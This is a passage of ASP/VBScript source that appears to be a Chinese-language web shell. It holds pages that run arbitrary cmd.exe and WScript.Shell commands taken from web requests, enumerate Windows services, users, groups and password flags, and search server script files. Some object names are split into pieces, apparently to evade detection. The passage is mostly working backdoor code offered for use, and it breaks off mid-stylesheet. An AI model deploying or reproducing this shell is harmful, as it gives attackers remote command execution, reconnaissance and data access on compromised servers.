echo "所在路径: <input name=appPath type=text id=appPath value=""" & HtmlEncode(appPath) & """ size=62><br/>"
echo "程序文件: <input name=appName type=text id=appName value=""" & HtmlEncode(appName) & """ size=62> "
echo "<input type=button name=Submit4 value=' 回显 ' onClick=""this.form.appArgs.value+=' > '+this.form.aspPath.value;""><br/> "
echo "命令参数: <input name=appArgs type=text id=appArgs value=""" & HtmlEncode(appArgs) & """ size=62> "
echo "<input type=submit name=Submit value=' 运行 '><br/>"
echo "<hr/>注: 只有命令行程序在CMD.EXE运行环境下才可以进行临时文件回显(利用"">""符号),其它程序只能执行不能回显.<br/>"
echo " 由于命令执行时间同网页刷新时间不同步,所以有些执行时间长的程序结果需要手动刷新下面的iframe才能得到.回显后记得删除临时文件.<hr/>"
echo "<iframe id=cmdResult style='width:100%;height:78%;'>"
echo "</iframe>"
echo "</form>"
echo "</body>"
End Sub
Sub PageServiceList()
Dim sa, objService, objComputer
showTitle("系统服务信息查看")
Set objComputer = GetObject("WinNT://.")
Set sa = Server.CreateObject("She"&T&"ll.Appl"&T&"ication")
objComputer.Filter = Array("Service")
echo "<ol>"
If isDebugMode = False Then
On Error Resume Next
End If
For Each objService In objComputer
echo "<li>" & objService.Name & "</li><hr/>"
echo "<ol>服务名称: " & objService.Name & "<br/>"
echo "显示名称: " & objService.DisplayName & "<br/>"
echo "启动类型: " & getStartType(objService.StartType) & "<br/>"
echo "运行状态: " & sa.IsServiceRunning(objService.Name) & "<br/>"
' echo "当前状态: " & objService.Status & "<br/>"
' echo "服务类型: " & objService.ServiceType & "<br/>"
echo "登录身份: " & objService.ServiceAccountName & "<br/>"
echo "服务描述: " & getServiceDsc(objService.Name) & "<br/>"
echo "文件路径及参数: " & objService.Path
echo "</ol><hr/>"
Next
echo "</ol><hr/>"
Set sa = Nothing
End Sub
Function getServiceDsc(strService)
Dim ws
Set ws = Server.CreateObject("WScr"&x&"ipt.Shell")
getServiceDsc = ws.RegRead("HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\" & strService & "\Description")
Set ws = Nothing
End Function
Sub PageTxtSearcher()
Response.Buffer = True
Server.ScriptTimeOut = 5000
Dim keyword, theAct, thePath, theFolder
theAct = Request("theAct")
keyword = Trim(Request("keyword"))
thePath = Trim(Request("thePath"))
showTitle("文本文件搜索器")
If thePath = "" Then
thePath = Server.MapPath("\")
End If
echo "FSO文件搜索:"
echo "<hr/>"
echo "<form name=form1 method=post action=?zxzgcn=TxtSearcher&theAct=fsoSearch onsubmit=this.Submit.disabled=true>"
echo "路径: <input name=thePath type=text value=""" & HtmlEncode(thePath) & """ id=thePath size=61><br/>"
echo "关键字: <input name=keyword type=text value=""" & HtmlEncode(keyword) & """ id=keyword size=60>"
echo "<input type=submit name=Submit value=给我搜>"
echo "</form>"
echo "<hr/>"
echo "She"&T&"ll.Appl"&T&"ication & ad"&e&"odb.st"&e&"ream文件搜索:"
echo "<hr/>"
echo "<form name=form1 method=post action=?zxzgcn=TxtSearcher&theAct=saSearch onsubmit=this.Submit2.disabled=true>"
echo "路径: <input name=thePath type=text value=""" & HtmlEncode(thePath) & """ id=thePath size=61><br/>"
echo "关键字: <input name=keyword type=text value=""" & HtmlEncode(keyword) & """ id=keyword size=60>"
echo "<input type=submit name=Submit2 value=给我搜>"
echo "</form>"
echo "<hr/>"
If theAct = "fsoSearch" And keyword <> "" Then
Set theFolder = fsoX.GetFolder(thePath)
Call searchFolder(theFolder, keyword)
Set theFolder = Nothing
End If
If theAct = "saSearch" And keyword <> "" Then
Call appSearchIt(thePath, keyword)
End If
echo "<hr/>"
End Sub
Sub searchFolder(folder, str)
Dim ext, title, theFile, theFolder
For Each theFile In folder.Files
ext = LCase(Split(theFile.Path, ".")(UBound(Split(theFile.Path, "."))))
If InStr(LCase(theFile.Name), LCase(str)) > 0 Then
echo fileLink(theFile, "")
End If
If ext = "asp" Or ext = "asa" Or ext = "cer" Or ext = "cdx" Then
If searchFile(theFile, str, title, "fso") Then
echo fileLink(theFile, title)
End If
End If
Next
Response.Flush()
For Each theFolder In folder.subFolders
searchFolder theFolder, str
Next
end sub
Function searchFile(f, s, title, method)
If isDebugMode = False Then
On Error Resume Next
End If
Dim theFile, content, pos1, pos2
If method = "fso" Then
Set theFile = fsoX.OpenTextFile(f.Path)
content = theFile.ReadAll()
theFile.Close
Set theFile = Nothing
Else
content = streamLoadFromFile(f.Path)
End If
If Err Then
Err.Clear
content = ""
End If
searchFile = InStr(1, content, S, vbTextCompare) > 0
If searchFile Then
pos1 = InStr(1, content, "<TITLE>", vbTextCompare)
pos2 = InStr(1, content, "</TITLE>", vbTextCompare)
title = ""
If pos1 > 0 And pos2 > 0 Then
title = Mid(content, pos1 + 7, pos2 - pos1 - 7)
End If
End If
End Function
Function fileLink(f, title)
fileLink = f.Path
If title = "" Then
title = f.Name
End If
fileLink = "<li><font color=ff0000>" & title & "</font> " & fileLink & "</li>"
End Function
Sub appSearchIt(thePath, theKey)
Dim title, extName, objFolder, objItem, fileName
Set objFolder = saX.NameSpace(thePath)
For Each objItem In objFolder.Items
If objItem.IsFolder = True Then
Call appSearchIt(objItem.Path, theKey)
Response.Flush()
Else
extName = LCase(Split(objItem.Path, ".")(UBound(Split(objItem.Path, "."))))
fileName = Split(objItem.Path, "\")(UBound(Split(objItem.Path, "\")))
If InStr(LCase(fileName), LCase(theKey)) > 0 Then
echo fileLink(objItem, "")
End If
If extName = "asp" Or extName = "asa" Or extName = "cer" Or extName = "cdx" Then
If searchFile(objItem, theKey, title, "application") Then
echo fileLink(objItem, title)
End If
End If
End If
Next
End Sub
Sub PageUserList()
Dim objUser, objGroup, objComputer
showTitle("系统用户及用户组信息查看")
Set objComputer = GetObject("WinNT://.")
objComputer.Filter = Array("User")
echo "<a href=javascript:showHideMe(userList);>User:</a>"
echo "<span id=userList><hr/>"
For Each objUser in objComputer
echo "<li>" & objUser.Name & "</li>"
echo "<ol><hr/>"
getUserInfo(objUser.Name)
echo "<hr/></ol>"
Next
echo "</span>"
echo "<br/><a href=javascript:showHideMe(userGroupList);>UserGroup:</a>"
echo "<span id=userGroupList><hr/>"
objComputer.Filter = Array("Group")
For Each objGroup in objComputer
echo "<li>" & objGroup.Name & "</li>"
echo "<ol><hr/>" & objGroup.Description & "<hr/></ol>"
Next
echo "</span><hr/>"
End Sub
Sub getUserInfo(strUser)
Dim User, Flags
If isDebugMode = False Then
On Error Resume Next
End If
Set User = GetObject("WinNT://./" & strUser & ",user")
echo "描述: " & User.Description & "<br/>"
echo "所属用户组: " & getItsGroup(strUser) & "<br/>"
echo "密码已过期: " & cbool(User.Get("PasswordExpired")) & "<br/>"
Flags = User.Get("UserFlags")
echo "密码永不过期: " & cbool(Flags And &H10000) & "<br/>"
echo "用户不能更改密码: " & cbool(Flags And &H00040) & "<br/>"
echo "非全局帐号: " & cbool(Flags And &H100) & "<br/>"
echo "密码的最小长度: " & User.PasswordMinimumLength & "<br/>"
echo "是否要求有密码: " & User.PasswordRequired & "<br/>"
echo "帐号停用中: " & User.AccountDisabled & "<br/>"
echo "帐号锁定中: " & User.IsAccountLocked & "<br/>"
echo "用户信息文件: " & User.Profile & "<br/>"
echo "用户登录脚本: " & User.LoginScript & "<br/>"
echo "用户Home目录: " & User.HomeDirectory & "<br/>"
echo "用户Home目录根: " & User.Get("HomeDirDrive") & "<br/>"
echo "帐号过期时间: " & User.AccountExpirationDate & "<br/>"
echo "帐号失败登录次数: " & User.BadLoginCount & "<br/>"
echo "帐号最后登录时间: " & User.LastLogin & "<br/>"
echo "帐号最后注销时间: " & User.LastLogoff & "<br/>"
For Each RegTime In User.LoginHours
If RegTime < 255 Then
Restrict = True
End If
Next
echo "帐号已用时间: " & Restrict & "<br/>"
Err.Clear
End Sub
Function getItsGroup(strUser)
Dim objUser, objGroup
Set objUser = GetObject("WinNT://./" & strUser & ",user")
For Each objGroup in objUser.Groups
getItsGroup = getItsGroup & " " & objGroup.Name
Next
End Function
Sub PageWsCmdRun()
Dim cmdStr, cmdPath, cmdResult
cmdStr = Request("cm"&x&"dStr")
cmdPath = Request("cmd"&x&"Path")
showTitle("WScri"&T&"pt.She"&T&"ll命令行操作")
If cmdPath = "" Then
cmdPath = "cm"&x&"d.exe"
End If
If cmdStr <> "" Then
If InStr(LCase(cmdPath), "c"&x&"md.exe") > 0 Or InStr(LCase(cmdPath), LCase(myCmdDotExeFile)) > 0 Then
cmdResult = doWsCmdRun(cmdPath & " /c " & cmdStr)
Else
If LCase(cmdPath) = "wscri"&x&"ptshell" Then
cmdResult = doWsCmdRun(cmdStr)
Else
cmdResult = doWsCmdRun(cmdPath & " " & cmdStr)
End If
End If
End If
echo "<style>body{margin:8;}</style>"
echo "<body onload=""document.forms[0].cmdStr.focus();document.forms[0].cmdResult.style.height=document.body.clientHeight-115;"">"
echo "<form method=post onSubmit='this.Submit.disabled=true'>"
echo "路径: <input name=cmdPath type=text id=cmdPath value=""" & HtmlEncode(cmdPath) & """ size=50> "
echo "<input type=button name=Submit2 value=使用WScri"&T&"pt.She"&T&"ll onClick=""this.form.cmdPath.value='WScriptShell';""><br/>"
echo "命令/参数: <input name=cmdStr type=text id=cmdStr value=""" & HtmlEncode(cmdStr) & """ size=62> "
echo "<input type=submit name=Submit value=' 运行 '><br/>"
echo "<hr/>注: 请只在这里执行单步程序(程序执行开始到结束不需要人工干预),不然本程序会无法正常工作,并且在服务器生成一个不可结束的进程.<hr/>"
echo "<textarea id=cmdResult style='width:100%;height:78%;'>"
echo HtmlEncode(cmdResult)
echo "</textarea>"
echo "</form>"
echo "</body>"
End Sub
Function doWsCmdRun(cmdStr)
If isDebugMode = False Then
On Error Resume Next
End If
Dim fso, theFile
Set fso = Server.CreateObject("Scripting.FileSystemObject")
doWsCmdRun = wsX.Exec(cmdStr).StdOut.ReadAll()
If Err Then
echo Err.Description & "<br>"
Err.Clear
wsX.Run cmdStr & " > " & aspPath, 0, True
Set theFile = fso.OpenTextFile(aspPath)
doWsCmdRun = theFile.RealAll()
If Err Then
echo Err.Description & "<br>"
Err.Clear
doWsCmdRun = streamLoadFromFile(aspPath)
End If
End If
Set fso = Nothing
End Function
Sub PageOther()
echo "<style>"
echo "A:visited {color: #333333;text-decoration: none;}"
echo "A:active {color: #333333;text-decoration: none;}"
echo "A:link {color: #000000;text-decoration: none;}"
echo "A:hover {color: #333333;text-decoration: none;}"
echo "BODY {font-size: 9pt;COLOR: #000000;font-family: ""Courier New"";border: none;background-color: buttonface;}"
echo "textarea {font-family: ""Courier New"";font-size: 12px;border-width: 1px;color: #000000;}"
echo "table {font-size: 9pt;}"
echo "form {margin: 0;}"
echo "#fsoDriveList span{width: 100px;}"
echo "#FileList span{width: 90;height: 70;cursor: hand;text-align: center;word-break: break-all;border: 1px solid buttonface;}"
echo ".anotherSpan{color: #ffffff;width: 90;height: 70;text-align: center;background-color: #0A246A;border: 1px solid #0A246A;}"
echo ".font{font